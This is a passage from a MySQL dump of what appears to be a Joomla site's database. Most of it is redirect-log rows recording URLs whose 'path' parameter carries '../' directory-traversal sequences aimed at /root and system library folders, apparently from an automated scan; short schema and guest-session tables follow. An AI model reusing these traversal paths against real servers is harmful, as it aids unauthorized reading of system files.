00:00:00',301),(80220,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../python2.7/../libpcrecpp.so.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2Flibpcrecpp.so.0','',1,0,'2026-06-24 18:47:18','0000-00-00 00:00:00',301),(80221,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../bind/../python3.6/binhex.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fbind%2F..%2Fpython3.6%2Fbinhex.py','',1,0,'2026-06-24 18:47:19','0000-00-00 00:00:00',301),(80222,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/autoconf/../awk/../awk/../ghostscript',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fautoconf%2F..%2Fawk%2F..%2Fawk%2F..%2Fghostscript','',1,0,'2026-06-24 18:47:20','0000-00-00 00:00:00',301),(80223,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/../lib64/python2.7/../python3.6/../pkgconfig',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.6%2F..%2Fpkgconfig','',1,0,'2026-06-24 18:47:21','0000-00-00 00:00:00',301),(80224,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/importlib/../platform.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fimportlib%2F..%2Fplatform.py','',1,0,'2026-06-24 18:47:22','0000-00-00 00:00:00',301),(80225,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../php/../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fphp%2F..%2F.','',1,0,'2026-06-24 18:47:23','0000-00-00 00:00:00',301),(80226,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../python2.7/md5.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpython2.7%2Fmd5.py','',1,0,'2026-06-24 18:47:24','0000-00-00 00:00:00',301),(80227,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../python2.7/json',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpython2.7%2Fjson','',1,0,'2026-06-24 18:47:25','0000-00-00 00:00:00',301),(80228,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/src/../bin/../include/gssapi',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fsrc%2F..%2Fbin%2F..%2Finclude%2Fgssapi','',1,0,'2026-06-24 18:47:26','0000-00-00 00:00:00',301),(80229,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python2.7/../python3.6/__phello__.foo.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython2.7%2F..%2Fpython3.6%2F__phello__.foo.py','',1,0,'2026-06-24 18:47:27','0000-00-00 00:00:00',301),(80230,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/multipath/../gssproxy/../python3.12/../python3.6',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fmultipath%2F..%2Fgssproxy%2F..%2Fpython3.12%2F..%2Fpython3.6','',1,0,'2026-06-24 18:47:29','0000-00-00 00:00:00',301),(80231,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/.././python2.7/tools/../string.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2F.%2Fpython2.7%2FTools%2F..%2Fstring.py','',1,0,'2026-06-24 18:47:30','0000-00-00 00:00:00',301),(80232,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/mysqlclient/../python3.6/json/../../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmysqlclient%2F..%2Fpython3.6%2Fjson%2F..%2F..%2F.','',1,0,'2026-06-24 18:47:31','0000-00-00 00:00:00',301),(80233,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/../device-mapper',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2F..%2Fdevice-mapper','',1,0,'2026-06-24 18:47:32','0000-00-00 00:00:00',301),(80234,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/./../python2.7/tools/../string.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F.%2F..%2Fpython2.7%2FTools%2F..%2Fstring.py','',1,0,'2026-06-24 18:47:33','0000-00-00 00:00:00',301),(80235,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../apache2/../php',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fapache2%2F..%2Fphp','',1,0,'2026-06-24 18:47:34','0000-00-00 00:00:00',301),(80236,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../dev/../../root',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2Fdev%2F..%2F..%2Froot','',1,0,'2026-06-24 18:47:35','0000-00-00 00:00:00',301),(80237,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/tkinter',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Ftkinter','',1,0,'2026-06-24 18:47:36','0000-00-00 00:00:00',301),(80238,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../.wp-cli/../.koality/../.httprequest/../cache',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2F.wp-cli%2F..%2F.koality%2F..%2F.HttpRequest%2F..%2Fcache','',1,0,'2026-06-24 18:47:37','0000-00-00 00:00:00',301),(80239,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../python3.12/difflib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Fpython3.12%2Fdifflib.py','',1,0,'2026-06-24 18:47:38','0000-00-00 00:00:00',301),(80240,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/importlib/../wave.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fimportlib%2F..%2Fwave.py','',1,0,'2026-06-24 18:47:39','0000-00-00 00:00:00',301),(80241,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/locale/../modules/../modules/../ghostscript',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Flocale%2F..%2FModules%2F..%2FModules%2F..%2Fghostscript','',1,0,'2026-06-24 18:47:40','0000-00-00 00:00:00',301),(80242,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python2.7/pprint.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython2.7%2Fpprint.pyc','',1,0,'2026-06-24 18:47:41','0000-00-00 00:00:00',301),(80243,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../php/../python3.6/__pycache__',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fphp%2F..%2Fpython3.6%2F__pycache__','',1,0,'2026-06-24 18:47:42','0000-00-00 00:00:00',301),(80244,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../.cl.selector/../../../../bin/recode',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.cl.selector%2F..%2F..%2F..%2F..%2Fbin%2Frecode','',1,0,'2026-06-24 18:47:43','0000-00-00 00:00:00',301),(80245,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../mysql/../python3.12/socket.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fmysql%2F..%2Fpython3.12%2Fsocket.py','',1,0,'2026-06-24 18:47:44','0000-00-00 00:00:00',301),(80246,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../dev/../root',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Fdev%2F..%2Froot','',1,0,'2026-06-24 18:47:45','0000-00-00 00:00:00',301),(80247,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.6/logging/../cgi.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.6%2Flogging%2F..%2Fcgi.py','',1,0,'2026-06-24 18:47:46','0000-00-00 00:00:00',301),(80248,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../networkmanager/../python3.12/genericpath.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2FNetworkManager%2F..%2Fpython3.12%2Fgenericpath.py','',1,0,'2026-06-24 18:47:47','0000-00-00 00:00:00',301),(80249,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/tools/../curses',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2FTools%2F..%2Fcurses','',1,0,'2026-06-24 18:47:48','0000-00-00 00:00:00',301),(80250,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/pty.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Fpty.py','',1,0,'2026-06-24 18:47:49','0000-00-00 00:00:00',301),(80251,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/uuid.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fuuid.py','',1,0,'2026-06-24 18:47:50','0000-00-00 00:00:00',301),(80252,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python3.6m/../netrom',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython3.6m%2F..%2Fnetrom','',1,0,'2026-06-24 18:47:51','0000-00-00 00:00:00',301),(80253,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/site.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Fsite.py','',1,0,'2026-06-24 18:47:52','0000-00-00 00:00:00',301),(80254,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../libproxy/../python2.7/simplehttpserver.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2Flibproxy%2F..%2Fpython2.7%2FSimpleHTTPServer.py','',1,0,'2026-06-24 18:47:54','0000-00-00 00:00:00',301),(80255,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/./code.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2F.%2Fcode.py','',1,0,'2026-06-24 18:47:54','0000-00-00 00:00:00',301),(80256,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/../netrom',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2F..%2Fnetrom','',1,0,'2026-06-24 18:47:55','0000-00-00 00:00:00',301),(80257,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/pdb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Fpdb.py','',1,0,'2026-06-24 18:47:55','0000-00-00 00:00:00',301),(80258,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../libproxy/../python2.7/cgitb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2Flibproxy%2F..%2Fpython2.7%2Fcgitb.py','',1,0,'2026-06-24 18:47:56','0000-00-00 00:00:00',301),(80259,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/src/../selector.etc/../include',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fsrc%2F..%2Fselector.etc%2F..%2Finclude','',1,0,'2026-06-24 18:47:57','0000-00-00 00:00:00',301),(80260,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../.cl.selector/../../../sbin/../include/python2.7/memoryobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.cl.selector%2F..%2F..%2F..%2Fsbin%2F..%2Finclude%2Fpython2.7%2Fmemoryobject.h','',1,0,'2026-06-24 18:47:58','0000-00-00 00:00:00',301),(80261,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/cache/./../php/../php/../..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fcache%2F.%2F..%2Fphp%2F..%2Fphp%2F..%2F..','',1,0,'2026-06-24 18:47:59','0000-00-00 00:00:00',301),(80262,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../libproxy/../python3.6/__pycache__',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flibproxy%2F..%2Fpython3.6%2F__pycache__','',1,0,'2026-06-24 18:48:00','0000-00-00 00:00:00',301),(80263,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/asyncio/../../x11',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fasyncio%2F..%2F..%2FX11','',1,0,'2026-06-24 18:48:01','0000-00-00 00:00:00',301),(80264,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python2.7/importlib/../opcode.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython2.7%2Fimportlib%2F..%2Fopcode.py','',1,0,'2026-06-24 18:48:02','0000-00-00 00:00:00',301),(80265,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/macurl2path.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fmacurl2path.pyo','',1,0,'2026-06-24 18:48:02','0000-00-00 00:00:00',301),(80266,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/xmlrpc/../socket.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fxmlrpc%2F..%2Fsocket.py','',1,0,'2026-06-24 18:48:03','0000-00-00 00:00:00',301),(80267,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../php/../python2.7/macpath.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fphp%2F..%2Fpython2.7%2Fmacpath.pyc','',1,0,'2026-06-24 18:48:04','0000-00-00 00:00:00',301),(80268,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/difflib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2Fdifflib.py','',1,0,'2026-06-24 18:48:06','0000-00-00 00:00:00',301),(80269,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../lua/../python3.6/ntpath.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Flua%2F..%2Fpython3.6%2Fntpath.py','',1,0,'2026-06-24 18:48:06','0000-00-00 00:00:00',301),(80270,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../pm-utils/../python2.7/pkgutil.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpm-utils%2F..%2Fpython2.7%2Fpkgutil.pyc','',1,0,'2026-06-24 18:48:07','0000-00-00 00:00:00',301),(80271,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../lua/../python3.6/trace.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Flua%2F..%2Fpython3.6%2Ftrace.py','',1,0,'2026-06-24 18:48:08','0000-00-00 00:00:00',301),(80272,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/python3.6/logging/__pycache__/../../struct.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fpython3.6%2Flogging%2F__pycache__%2F..%2F..%2Fstruct.py','',1,0,'2026-06-24 18:48:10','0000-00-00 00:00:00',301),(80273,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/apache2/../python3.6/../python3.12/poplib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fapache2%2F..%2Fpython3.6%2F..%2Fpython3.12%2Fpoplib.py','',1,0,'2026-06-24 18:48:11','0000-00-00 00:00:00',301),(80274,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python2.7/../elf.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython2.7%2F..%2Felf.h','',1,0,'2026-06-24 18:48:12','0000-00-00 00:00:00',301),(80275,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../python2.7/plistlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpython2.7%2Fplistlib.py','',1,0,'2026-06-24 18:48:13','0000-00-00 00:00:00',301),(80276,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/vim/../../include/../selector.etc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fvim%2F..%2F..%2Finclude%2F..%2Fselector.etc','',1,0,'2026-06-24 18:48:14','0000-00-00 00:00:00',301),(80277,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/encodings/../../python3.12/../python3.12/linecache.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fencodings%2F..%2F..%2Fpython3.12%2F..%2Fpython3.12%2Flinecache.py','',1,0,'2026-06-24 18:48:15','0000-00-00 00:00:00',301),(80278,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/asyncio/../../libcom_err.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fasyncio%2F..%2F..%2Flibcom_err.so','',1,0,'2026-06-24 18:48:16','0000-00-00 00:00:00',301),(80279,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/concurrent/../wave.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fconcurrent%2F..%2Fwave.py','',1,0,'2026-06-24 18:48:17','0000-00-00 00:00:00',301),(80280,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/tomllib/../../python3.6/.././lua',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Ftomllib%2F..%2F..%2Fpython3.6%2F..%2F.%2Flua','',1,0,'2026-06-24 18:48:18','0000-00-00 00:00:00',301),(80281,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/mysqlclient/../python3.6/difflib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmysqlclient%2F..%2Fpython3.6%2Fdifflib.py','',1,0,'2026-06-24 18:48:19','0000-00-00 00:00:00',301),(80282,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/importlib/../codecs.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fimportlib%2F..%2Fcodecs.py','',1,0,'2026-06-24 18:48:20','0000-00-00 00:00:00',301);
/*!40000 ALTER TABLE `fz6t4_redirect_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_schemas`
--

DROP TABLE IF EXISTS `fz6t4_schemas`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_schemas` (
  `extension_id` int NOT NULL,
  `version_id` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`extension_id`,`version_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_schemas`
--

LOCK TABLES `fz6t4_schemas` WRITE;
/*!40000 ALTER TABLE `fz6t4_schemas` DISABLE KEYS */;
INSERT INTO `fz6t4_schemas` VALUES (700,'3.10.7-2022-03-18'),(10039,'4.0'),(10127,'2.0.1');
/*!40000 ALTER TABLE `fz6t4_schemas` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_session`
--

DROP TABLE IF EXISTS `fz6t4_session`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_session` (
  `session_id` varbinary(192) NOT NULL,
  `client_id` tinyint unsigned DEFAULT NULL,
  `guest` tinyint unsigned DEFAULT '1',
  `time` int NOT NULL DEFAULT '0',
  `data` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `userid` int DEFAULT '0',
  `username` varchar(150) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`),
  KEY `client_id_guest` (`client_id`,`guest`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_session`
--

LOCK TABLES `fz6t4_session` WRITE;
/*!40000 ALTER TABLE `fz6t4_session` DISABLE KEYS */;
INSERT INTO `fz6t4_session` VALUES (_binary '6a9824e834944f49825b2ca18cfe9d1a',0,1,1782326470,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTc4MjMyNjQ3MDtzOjQ6Imxhc3QiO2k6MTc4MjMyNjQ3MDtzOjM6Im5vdyI7aToxNzgyMzI2NDcwO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'be2b0b58bafbbc8aecc80fcfe7141cb1',0,1,1782326522,'joomla|s:668:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxMDU7czo1OiJ0aW1lciI7Tzo4OiJzdGRDbGFzcyI6Mzp7czo1OiJzdGFydCI7aToxNzgyMzI2NDcwO3M6NDoibGFzdCI7aToxNzgyMzI2NTIyO3M6Mzoibm93IjtpOjE3ODIzMjY1MjI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";',0,''),(_binary 